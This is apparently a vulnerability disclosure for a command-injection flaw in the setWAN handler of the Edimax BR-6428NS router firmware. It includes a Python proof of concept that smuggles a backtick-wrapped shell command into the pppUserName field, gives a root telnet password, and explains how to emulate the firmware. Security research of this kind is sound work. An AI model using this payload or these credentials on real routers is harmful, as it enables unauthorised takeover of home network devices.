Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Command Injection

Command injection without any limitations

Firmware

Wireless: Edimax home Wireless Routers N300

Firmware Version: BR-6428NS_v4_1.10

You can download Firmware at this website and use FirmAE to simulate the router environment.

FirmAE command: ./run.sh -r v4 BR-6428NS_v4_1.10.bin(This will take a while, please be patient:)

image-20230428095433531

Description

The vulnerability was found in /bin/webs.

Function is setWAN

image-20230428112152251

poc

python

import requests

command = "touch /tmp/Swe3ty4"

url = "http://192.168.2.1/goform/setWAN"
data = {
	"wanMode":"2",
	"pppUserName":"`"+command+"`"
}

r = requests.post(url,data=data)
print(r.text)

use root/edimaxens telnet to the router

telnet 192.168.2.1

image-20230428112407623